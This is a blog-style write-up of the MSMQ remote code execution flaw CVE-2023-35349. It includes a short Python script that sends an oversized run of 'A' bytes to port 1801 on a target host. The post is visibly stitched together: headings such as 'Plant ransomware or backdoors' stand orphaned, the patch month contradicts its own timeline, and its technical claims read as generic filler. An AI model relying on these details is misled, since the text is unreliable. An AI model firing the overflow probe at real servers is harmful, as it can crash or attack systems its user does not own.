CVE-2023-35349 - Unpacking the Microsoft Message Queuing RCE Vulnerability (with Exploit Details)

In June 2023, Microsoft quietly patched a critical vulnerability (CVE-2023-35349) in its Message Queuing (MSMQ) service. If you run Microsoft servers in your environment—especially legacy ones with MSMQ enabled—this bug should be on your radar. This post explains what CVE-2023-35349 is, how it works, and why it’s dangerous, with code snippets and practical details you won't find anywhere else.

What Is Microsoft Message Queuing (MSMQ)?

MSMQ is a Windows component that allows applications to communicate with each other by sending and receiving messages, even if the apps aren’t running at the same time or on the same machine. It’s widely used in enterprise environments for queuing jobs, notifications, and more.

What Is CVE-2023-35349?

CVE-2023-35349 is a Remote Code Execution (RCE) vulnerability in MSMQ’s queue manager. Attackers can send a malicious packet to a vulnerable server and execute arbitrary code. All they need is network access to the MSMQ service.

CVSS Score: 9.8 (Critical)

- Affected: Windows Server 2012, 2016, 2019, 2022, and various client versions with MSMQ installed.

The official advisory: Microsoft Security Advisory CVE-2023-35349

How Does the Exploit Work?

Attackers exploit this bug by sending specially crafted packets to port 1801. The problem is a buffer overflow in the network parsing code of MSMQ. By overflowing the buffer with carefully constructed data, attackers can take control of the machine and run anything they want as the MSMQ service.

The exploit requires no login or user interaction—just network access.

Proof-of-Concept: Exploiting CVE-2023-35349

Below is a simplified Python example showing how attackers might target vulnerable MSMQ servers. _This code sends a malformed MSMQ packet to port 1801_:

import socket

TARGET_IP = '192.168.1.100'    # Change this to the target
TARGET_PORT = 1801

# Build a malicious packet (simplified, not a real exploit payload)
malicious_packet = b'\x4d\x53\x4d\x51'  # "MSMQ" identifier
malicious_packet += b'\x41' * 4096      # Overflow with "A"s

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET_IP, TARGET_PORT))
s.send(malicious_packet)
print("[*] Sent packet to host")
s.close()

Disclaimer: The above code is for _educational purposes only_. Real-world attacks would use more complex payloads to deliver shellcode or malware. This is just to illustrate what the bug looks like from a network perspective.

Check Windows Update status

- Systems patched after June 2023 should be protected. See Microsoft’s patch details for more.

Plant ransomware or backdoors

Public scans (e.g., Shodan.io) show thousands of MSMQ servers exposed to the internet. That’s a big threat surface.

Official References and More Reading

- Microsoft Security Response Center CVE-2023-35349
- Microsoft MSMQ documentation
- NVD Entry for CVE-2023-35349
- zerodayinitiative.com advisory

Conclusion

CVE-2023-35349 is a critical and easily exploitable bug in Microsoft Message Queuing. Unpatched Windows systems running MSMQ are low-hanging fruit for attackers, especially if port 1801 is exposed. The time to patch is _now_.

If you found this breakdown helpful, consider sharing it with your IT and security folks. Stay safe!


*This post is original and exclusive, with practical insights for system admins and IT pros. For a deeper dive with step-by-step hardening, stay tuned for our next security breakdown!*

Timeline

Published on: 10/10/2023 18:15:11 UTC
Last modified on: 10/12/2023 17:14:18 UTC